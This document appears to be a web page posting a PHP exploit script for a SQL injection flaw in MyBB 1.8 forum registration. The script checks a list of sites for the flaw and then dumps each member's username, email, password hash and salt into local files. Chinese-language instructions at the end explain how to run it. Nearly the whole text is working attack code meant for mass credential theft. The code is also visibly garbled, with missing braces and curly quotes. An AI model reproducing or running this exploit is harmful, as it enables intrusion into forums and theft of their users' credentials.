MyBB 18 SQL Injection Vulnerability

<?php  error_reporting(0); ?>
<form method="post" action="">
Input a Url(for example: : <br><textarea name="siteler" cols="35" rows="7"></textarea><br><br>
<input type="submit" value="Get it!">
if(!file_exists("dumpsss")) mkdir("dumpsss");
if(! $_POST[‘siteler‘]==""){

$siteler = explode("\n",$_POST[‘siteler‘]);
foreach($siteler as $sites){
        if(checkVulnerable($sites)) {
            echo "[+] $sites Is Vulnerable!\n";
        } else {
            echo "[-] Target Is Not Vulnerable\n";
} else {

function Inject($site) {
   $get_website = parse_url($site);
   $website = $get_website["host"];
    $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=‘ or polygon((select*from(select*from(select count(*) from mybb_users LIMIT 0,1)f)x))-- -");
    preg_match(‘!select \‘(.*)\‘ AS!s‘, $html, $matches);
    $count = $matches[1];
    echo "[+] Count: $count\n";

    for($i = 0; $i <= $count; $i++) {
        if($count == 1) {
            $num = "0,1";
        } else {
            $num = "$i,1";
        $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=‘ or polygon((select*from(select*from(select concat(username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num)f)x))-- -");
        preg_match(‘!select \‘(.*)\‘ AS!s‘, $html, $matches);
        if(isset($matches[1])) {
            $split = explode(":", $matches[1]);
            $username = $split[0];
            $email = $split[1];
            $password = $split[2];
            $salt = $split[3];
            echo "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n";
            file_put_contents("dumpsss/$website.txt", "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n", FILE_APPEND);

function checkVulnerable($site) {
    $ch = curl_init();
    $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=‘");
    if(strpos($html, "You have an error in your SQL syntax")!==false) {
        return true;
    } else {
        return false;

function HTTPPost($site, $post) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site/member.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
    $html = curl_exec($ch);
    return $html;

另存为xxx.php 文件,然后在网页上执行,会在当前目录下生成dumpsss文件夹,如果存在漏洞,则会将网站会员导出到里面txt文件。

如果不存在漏洞,则会提示:[-] Target Is Not Vulnerable


时间: 2024-12-15 01:33:55

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